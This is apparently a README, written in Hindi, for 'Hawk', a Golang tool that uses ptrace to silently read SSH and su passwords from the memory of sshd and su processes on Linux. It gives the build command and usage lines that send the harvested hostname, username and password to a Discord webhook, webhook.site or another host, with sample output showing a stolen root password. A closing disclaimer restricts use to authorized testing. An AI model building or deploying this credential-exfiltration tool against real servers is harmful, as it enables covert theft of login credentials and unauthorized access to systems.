
sshd और su सेवाओं के माध्यम से मिले पासवर्डों को बाहर निकालने (exfiltrate) के लिए डिज़ाइन किया गया Golang टूल।
रीयल-टाइम में SSH और SU क्रेडेंशियल्स को चुपचाप इंटरसेप्ट करें
Hawk sshd और su प्रोसेस की निगरानी करता है, टारगेट प्रोसेस को संशोधित किए बिना ptrace के माध्यम से मेमोरी से पासवर्ड निकालता है। ज़ीरो राइट्स। पूर्णतः रीड-ओनली क्रेडेंशियल हार्वेस्टिंग।

Hawk SSH और SU प्रोसेस का पता लगाने के लिए Linux की /proc फाइलसिस्टम का उपयोग करता है, फिर syscalls को अटैच और इंटरसेप्ट करने के लिए ptrace का उपयोग करता है। जब पासवर्ड प्रमाणीकरण होता है, तो यह write() syscall के दौरान सीधे प्रोसेस मेमोरी से पासवर्ड पढ़ता है—जो टारगेट प्रोसेस के लिए पूरी तरह से पारदर्शी होता है। क्रेडेंशियल्स वेबहुक के माध्यम से एक्सफिलट्रेट किए जाते हैं या stdout पर प्रिंट किए जाते हैं।
गहन अध्ययन: ब्लॉग पोस्ट
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawk
Hawk स्वचालित रूप से Discord वेबहुक का पता लगाता है और फॉर्मेटेड संदेश भेजता है:
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN
सेटअप: अपने Discord सर्वर में Discord की वेबहुक गाइड के अनुसार एक वेबहुक बनाएँ। क्रेडेंशियल्स आपके चैनल में होस्टनाम, उपयोगकर्ता नाम और पासवर्ड के साथ फॉर्मेटेड दिखाई देंगे।
अन्य वेबहुक सेवाओं के लिए (webhook.site, कस्टम सर्वर, आदि):
# HTTPS (ऑटो-डिटेक्टेड)
./hawk https://webhook.site/your-unique-id
# HTTP
./hawk http://192.168.1.100:6969/webhook
# यदि कोई प्रोटोकॉल निर्दिष्ट न हो तो ऑटो HTTPS
./hawk webhook.example.com/path
कोई वेबहुक नहीं? क्रेडेंशियल्स stdout पर प्रिंट होते हैं:
./hawk
आउटपुट:
hostname=server01 username=root password=SuperSecret123
/proc फाइलसिस्टम माउंटेड होयह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। जिम्मेदारी से उपयोग करें और केवल उन्हीं सिस्टम पर जिनके आप मालिक हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति है।